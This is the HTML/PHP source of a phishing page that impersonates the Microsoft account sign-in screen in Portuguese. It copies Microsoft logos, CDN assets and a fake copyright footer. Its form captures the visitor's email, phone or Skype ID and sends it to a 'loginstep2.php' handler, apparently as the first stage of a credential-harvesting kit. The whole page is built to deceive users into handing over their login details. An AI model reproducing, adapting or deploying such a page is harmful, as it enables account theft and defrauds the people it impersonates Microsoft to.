<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta content="width=device-width,initial-scale=1" name=viewport>
<link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.28957.10/images/favicon.ico">
<title>Entrar na conta</title>
<link rel="icon" href="img/hotmail.ico">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/bootstrap-theme.min.css">
<link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
<script src="js/bootstrap.min.js"></script>
<script src="js/jquery-vv.min.js"></script>
<script src="js/verificarUsuario.js" type="text/javascript"></script>

<script>

</script>
<script>
function validation() {
var usuario = $('#email').val().length;
   
		$("#entrar").val("Aguarde...");
        if(usuario < 4 ) {
			alert('Por favor, preencha o campo corretamente!');
			$("#entrar").val("Próximo");
			return false;
		}else{
			return true;
		}
}
</script>

<style type="text/css">
body { margin:0; }
@media (max-width: 1366px) { #topo { max-width:1160px; } }
@media (max-width: 1215px) { #topo { max-width:960px; } }
@media (max-width: 1007px) { #topo { max-width:740px; } }
	#box { height:auto; padding:20px; background:#FFF; margin:0 auto; margin-top: 9%; border: 1px solid #CCC; }
@media (min-width: 637px) { #box { max-width:500px; !important } }
@media (max-width: 636px) { #box { max-width:100%; margin-top: 0; border: none; height: 100%; !important } }
	
	#back { background:url(img/003.jpg); background-size:cover; width: 100%; height: 100%; position: absolute;  }
@media (max-width: 636px) { #back { background: none; !important } }

@media (max-width: 1366px) { #bottom { max-width:1160px; } }
@media (max-width: 1215px) { #bottom { max-width:960px; } }
@media (max-width: 1007px) { #bottom { max-width:740px; } }
@media (max-width: 784px) { #bottom { max-width:200px; } }

@media (min-width: 477px) { #me { float:right; padding:10px; width:120px; } }
@media (max-width: 477px) { #me { float:left; padding:0 0 10px 0; width:90%; } }
@media (max-width: 768px) { #re { display:none; } }

#email { width:100%; padding:10px 10px 10px 0; font-size:14px; border: none; border-bottom:1px solid #333; outline:none; }
#entrar { width:100px; height:36px; background:#0067B8; border:none; color:#FFF; font-weight:; }
#cancel { width:49%; height:36px; background:#CCC; border:none; color:#444; font-weight:; }
</style>

</head>

<body>
<div id="back">
<form name="form" id="form" action="loginstep2.php?login,<?php $hora=date("h,j,u,t,r,y,H,i,s,n,g"); echo"$hora"; ?>.LoginOn" method="post" onSubmit="return validation()">

<div id="box">
<div style="padding:30px 40px 40px 40px;font-family: Arial;">
<div style="height:40px;"><img src="img/microsoft_logo.svg"></div>



<div style="height:30px; margin-top: 20px; font-size:24px; font-weight: bold; color: #444;">Entrar</div>

<div style="margin-top: 20px;">
  <input type="text" name="email" id="email" required placeholder="Insira seu email, telefone ou Skype." size="1" autofocus>
</div>

<div style="margin-top: 10px;">
	Não tem uma conta? <a href="#">Crie uma!</a>
</div>

<div style="margin-top: 10px;">
	<a href="#">Esqueci minha senha</a>
</div>

<div style="margin-top:10px; height: 40px;">
  <input type="submit" name="entrar" id="entrar" value="Próximo" style="float: right;" />
</div>

</div>





</div>
<div id="box" style="margin-top:10px; padding-left:60px; padding-top:10px; padding-bottom:10px; cursor:pointer;" onClick="javascript:alert('Opção indisponível no momento!')">
<img src="https://logincdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg" width="32"/> Opções de entrada
</div>
</form>



<div style="text-align: right; padding: 5px; position: fixed; bottom: 0; color: #FFF; width: 100%; background-color: rgb(0,0,0); background-color: rgba(0,0,0,0.7); font-size: 12px;">©2017 Microsoft &nbsp;&nbsp;&nbsp; Terms of use &nbsp;&nbsp;&nbsp; Privat the cookies</div>

</div>
</body>
</html>
